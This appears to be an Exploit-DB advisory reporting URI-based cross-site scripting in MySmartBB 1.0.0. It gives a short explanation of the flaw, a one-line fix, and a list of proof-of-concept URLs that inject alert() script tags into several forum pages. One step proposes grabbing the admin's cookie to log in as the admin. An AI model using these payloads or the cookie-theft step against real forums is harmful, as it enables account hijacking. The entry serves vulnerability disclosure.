MySmartBB 1.0.0 – Cross-Site Scripting

  • 作者: indoushka
    日期: 2010-02-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11558/
  • ========================================================================================
    | # Title: MySmartBB 1.0.0 Cross Site Scripting in URI Vulnerability
    | # Author : indoushka 
    | # email: indoushka@hotmail.com 
    | # Home : www.iq-ty.com 
    | # Web Site : http://www.mysmartbb.com/ 
    | # Dork : åÐÇ ÇáãæÞÚ íÚãá Úáì ãäÊÏì MySmartBB 1.0.0
    | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) 
    | # Bug: XSS 
    ======================Exploit By indoushka =================================
     # Exploit: 
     
    Cross Site Scripting in URI
     
    Vulnerability description
    
    This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
    
    Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. 
    
    This XSS variant usually appears when a PHP script is using one of following variables without filtering them: 
    
    PHP_SELF 
    REQUEST_URI 
    SCRIPT_URL 
    SCRIPT_URI 
    
    Those variables are set either by Apache or the PHP engine. Apache is automatically ignoring anything in the URI after the .php extension for mapping script filename, but these variables are containing the full URI.
    This vulnerability affects /MySBB/misc.php. 
    The impact of this vulnerability
    Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. 
    
    Attack details
    
    1- http://127.0.0.1/MySBB/register.php?index=1
    
    2- http://127.0.0.1/MySBB/usercp.php?cp=1&sig=1&main=1 (test isi it infected by XSS use this cod: <ScRiPt>alert(213771818860)</ScRiPt> in the box)
    
    3- http://127.0.0.1/MySBB/misc.php?profile=1&id=2 (to confirm is it infected)
    
    4- send a msg to admin and use cookie graber 2 get the pass to login
    
    http://127.0.0.1/MySBB/misc.php/>'><ScRiPt>alert(469588561854)</ScRiPt> 
    
    http://127.0.0.1/MySBB/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
    
    http://127.0.0.1/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
    
    http://127.0.0.1/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
    
    http://127.0.0.1/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
    
    http://127.0.0.1/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
    
    http://127.0.0.1/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
    
    How to fix this vulnerability
    
    Your script should filter metacharacters from user input.
    
    Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX ==========================================
    Greetz : 
    Exploit-db Team : 
    (loneferret+Exploits+dookie2000ca)
    all my friend :
    His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
    www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) * www.kadmiwe.net
    www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
    www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net * www.alkrsan.net 
    --------------------------------------------------------------------------------------------------------------